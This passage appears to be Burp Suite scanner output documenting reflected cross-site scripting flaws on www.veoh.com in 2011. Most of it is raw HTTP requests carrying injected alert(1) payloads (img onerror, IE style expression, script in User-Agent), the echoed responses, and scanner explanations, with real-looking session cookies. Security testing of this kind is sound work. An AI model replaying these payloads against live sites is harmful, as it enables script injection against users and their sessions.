GET /category/list/tab/home254d4"><img%20src%3da%20onerror%3dalert(1)>329c969f72e HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4420 Date: Thu, 03 Feb 2011 21:46:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=91
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3604"><img%20src%3da%20onerror%3dalert(1)>53d97fb589d was submitted in the REST URL parameter 4. This input was echoed as d3604"><img src=a onerror=alert(1)>53d97fb589d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/moviesd3604"><img%20src%3da%20onerror%3dalert(1)>53d97fb589d HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4472 Date: Thu, 03 Feb 2011 21:46:45 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=34
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32244"><img%20src%3da%20onerror%3dalert(1)>f5bcaf4b0ea was submitted in the REST URL parameter 4. This input was echoed as 32244"><img src=a onerror=alert(1)>f5bcaf4b0ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/music32244"><img%20src%3da%20onerror%3dalert(1)>f5bcaf4b0ea HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4446 Date: Thu, 03 Feb 2011 21:46:52 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=99
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21de1"><img%20src%3da%20onerror%3dalert(1)>a2d080657a4 was submitted in the REST URL parameter 4. This input was echoed as 21de1"><img src=a onerror=alert(1)>a2d080657a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/tvshows21de1"><img%20src%3da%20onerror%3dalert(1)>a2d080657a4 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4498 Date: Thu, 03 Feb 2011 21:46:41 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=49
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97565"><img%20src%3da%20onerror%3dalert(1)>386056b84fa was submitted in the REST URL parameter 4. This input was echoed as 97565"><img src=a onerror=alert(1)>386056b84fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/videos97565"><img%20src%3da%20onerror%3dalert(1)>386056b84fa HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4472 Date: Thu, 03 Feb 2011 21:46:41 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=90
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac136"><img%20src%3da%20onerror%3dalert(1)>223b61dcbe7 was submitted in the REST URL parameter 4. This input was echoed as ac136"><img src=a onerror=alert(1)>223b61dcbe7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/webseriesac136"><img%20src%3da%20onerror%3dalert(1)>223b61dcbe7 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4550 Date: Thu, 03 Feb 2011 21:46:59 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=81
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2a30"style%3d"x%3aexpression(alert(1))"fc975c07eb6 was submitted in the REST URL parameter 4. This input was echoed as b2a30"style="x:expression(alert(1))"fc975c07eb6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /download/index/permalinkId/v18978294NGnK88j8b2a30"style%3d"x%3aexpression(alert(1))"fc975c07eb6 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:47:21 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=60 Content-Length: 26859
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/ ...[SNIP]... <a id="thumb_browse_1" href="/browse/videos/category//watch/v18978294NGnK88j8b2a30"style="x:expression(alert(1))"fc975c07eb6" title="" class="thumb thumbLink" onclick=""> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ce5ce<img%20src%3da%20onerror%3dalert(1)>c10905c976b was submitted in the REST URL parameter 4. This input was echoed as ce5ce<img src=a onerror=alert(1)>c10905c976b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos/q/-MENUVALUE-ce5ce<img%20src%3da%20onerror%3dalert(1)>c10905c976b HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:49:08 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=67 Content-Length: 59484
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"search","kw":"-MENUVALUE-ce5ce<img src=a onerror=alert(1)>c10905c976b","mature":"false","sortBy":"mostrelevant","bcategory":"category_"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc326"><img%20src%3da%20onerror%3dalert(1)>67cf1c4032e was submitted in the REST URL parameter 4. This input was echoed as cc326"><img src=a onerror=alert(1)>67cf1c4032e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos/q/-MENUVALUE-cc326"><img%20src%3da%20onerror%3dalert(1)>67cf1c4032e HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:48:43 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=98 Content-Length: 59675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/search/videos/q/-MENUVALUE-cc326"><img src=a onerror=alert(1)>67cf1c4032e" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14861"><img%20src%3da%20onerror%3dalert(1)>93bdcf942a3 was submitted in the REST URL parameter 4. This input was echoed as 14861"><img src=a onerror=alert(1)>93bdcf942a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos/q/publisher:bunny1234414861"><img%20src%3da%20onerror%3dalert(1)>93bdcf942a3 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:48:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=78
Content-Length: 60152
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/search/videos/q/publisher:bunny1234414861"><img src=a onerror=alert(1)>93bdcf942a3" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e34d7<img%20src%3da%20onerror%3dalert(1)>3d0b8bddcb4 was submitted in the REST URL parameter 4. This input was echoed as e34d7<img src=a onerror=alert(1)>3d0b8bddcb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos/q/publisher:bunny12344e34d7<img%20src%3da%20onerror%3dalert(1)>3d0b8bddcb4 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:49:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=62
Content-Length: 59961
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"search","kw":"publisher:bunny12344e34d7<img src=a onerror=alert(1)>3d0b8bddcb4","mature":"false","sortBy":"mostrelevant","bcategory":"category_"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a041"style%3d"x%3aexpression(alert(1))"ad20725130b was submitted in the REST URL parameter 4. This input was echoed as 1a041"style="x:expression(alert(1))"ad20725130b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video/flag/permalinkId/v18978294NGnK88j81a041"style%3d"x%3aexpression(alert(1))"ad20725130b HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:28 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=88
Content-Length: 32282
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <form id="flagVideoForm" method="post" action="/video/submitflag/permalinkId/v18978294NGnK88j81a041"style="x:expression(alert(1))"ad20725130b" name="flagVideoForm" onsubmit="return verifyFlag(this);"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42a1c"style%3d"x%3aexpression(alert(1))"80e77e495a9 was submitted in the REST URL parameter 4. This input was echoed as 42a1c"style="x:expression(alert(1))"80e77e495a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video/share/permalinkId/v18978294NGnK88j842a1c"style%3d"x%3aexpression(alert(1))"80e77e495a9 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=63
Content-Length: 30205
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <input type="text" onclick="this.select();" value="http://www.veoh.com/browse/videos/category//watch/v18978294NGnK88j842a1c"style="x:expression(alert(1))"80e77e495a9" readonly="true" /> ...[SNIP]...
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 266d5"><script>alert(1)</script>a3477cdc5c1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /video/flag/permalinkId/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)266d5"><script>alert(1)</script>a3477cdc5c1
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:15 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=70
Content-Length: 32288
